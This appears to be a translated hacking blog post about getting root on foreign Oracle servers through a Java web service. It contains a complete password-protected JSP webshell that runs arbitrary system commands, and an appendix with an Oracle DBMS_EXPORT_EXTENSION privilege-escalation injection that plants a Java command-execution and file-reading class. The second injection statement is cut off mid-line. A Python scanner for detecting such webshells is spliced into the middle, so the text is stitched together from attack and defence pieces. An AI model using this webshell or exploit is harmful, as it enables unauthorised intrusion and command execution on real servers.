A modified non-GBK JSP webshell [Network Technology]
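Source: 影子鹰
Recently I ran into some Oracle servers abroad. On many of these systems the kernel could not be used for local root, but there was a Java web service running with root privileges, and I had write permission on the web directory. The jshell I usually use, however, is GBK, and machines abroad (first Korean ones, which I let go; then Japanese ones; then Indian ones as well; I really couldn't stand it any more, so I modified one myself) basically do not support that font. With no other option, I modified a cmd webshell myself and added password authentication.
------------------------------ code divider ------------------------------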
<%@ page import="java.io.*" %>
<%
//by: vitter@safechina.net
String PASS = "vitter";
String cmd = request.getParameter("cmd");
String pass = request.getParameter("pass");
String output = "";
if (pass != null && pass.trim().length() > 0) {
if (pass.equals(PASS)) {
output = "Success";
request.getSession().setAttribute("loginUser", "loginOk");
} else {
output = "password ERR!";
request.getSession().removeAttribute("loginUser");
}
} else if (cmd != null) {
String s = null;
try {
Process p = Runtime.getRuntime().exec(cmd);
BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream()));
while ((s = sI.readLine()) != null) {
output += s;
}
}
catch (IOException e) {
e.printStackTrace();
}
}
boolean ifLogin = false;
Object loingUser = request.getSession().getAttribute("loginUser");
if (loingUser != null) {
ifLogin = true;
}
%>
<FORM METHOD=POST ACTION='vittercmd.jsp'>
<%
if (!ifLogin) {
%>
Password:<INPUT name='pass' type=password>
<%
} else {
%>
CMD:<INPUT name='cmd' type=TEXT>
<%
}
%>
<INPUT type=submit value='Run'>
</FORM>
<hr>
<pre>
<%=output %>
</pre>
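For defenders reviewing a web root, the two traits of the JSP above (a request parameter passed straight to Runtime.exec, and a constant string compared against another request parameter) can be matched statically. The Python scanner below is an added example, not part of the original article; the function name scan_jsp, the rule names and both sample snippets are constructed for illustration.

```python
import re

# A variable assigned directly from an HTTP request parameter.
PARAM_ASSIGN = re.compile(
    r'\b(?:String\s+)?(\w+)\s*=\s*request\.getParameter\s*\(\s*"([^"]*)"\s*\)')
# The argument text handed to Runtime.exec(...) or new ProcessBuilder(...).
EXEC_CALL = re.compile(r'(?:\.exec|new\s+ProcessBuilder)\s*\(([^;]*)\)\s*;')
# A non-empty string constant, a candidate hard-coded credential.
CONST_STR = re.compile(r'\bString\s+(\w+)\s*=\s*"[^"]+"\s*;')


def scan_jsp(source):
    """Return (rule, detail) findings for one JSP source string."""
    findings = []
    # Map variable name -> request parameter it was read from.
    tainted = {m.group(1): m.group(2) for m in PARAM_ASSIGN.finditer(source)}
    for call in EXEC_CALL.finditer(source):
        args = call.group(1)
        if "request.getParameter" in args:
            findings.append(("param-to-exec", "inline"))
        for var, param in tainted.items():
            if re.search(r'\b%s\b' % re.escape(var), args):
                findings.append(("param-to-exec", param))
    for const in CONST_STR.finditer(source):
        name = re.escape(const.group(1))
        for var in map(re.escape, tainted):
            either = r'\b(?:%s\.equals\(\s*%s\s*\)|%s\.equals\(\s*%s\s*\))' % (
                var, name, name, var)
            if re.search(either, source):
                findings.append(("hardcoded-secret-compare", const.group(1)))
    return findings


# Constructed samples (not taken from a real system).
SUSPECT = '''
String PASS = "changeme";
String cmd = request.getParameter("cmd");
String pass = request.getParameter("pass");
if (pass.equals(PASS)) { session.setAttribute("loginUser", "loginOk"); }
Process p = Runtime.getRuntime().exec(cmd);
'''
BENIGN = '''
String name = request.getParameter("name");
Process p = Runtime.getRuntime().exec("uptime");
out.print(name);
'''

if __name__ == "__main__":
    print(scan_jsp(SUSPECT))
    print(scan_jsp(BENIGN))
```

Pattern matching of this kind only catches direct, unobfuscated data flow, so treat a clean result as inconclusive and pair it with alerting on the servlet container's JVM spawning child processes.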
Appendix: a small Oracle privilege-escalation trick
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
}'''';END;'';END;--','SYS',0,'1',0) from dual ;
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
create or replace and compile java source named "LinxUtil" as import java.io.*;import java.net.URL; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(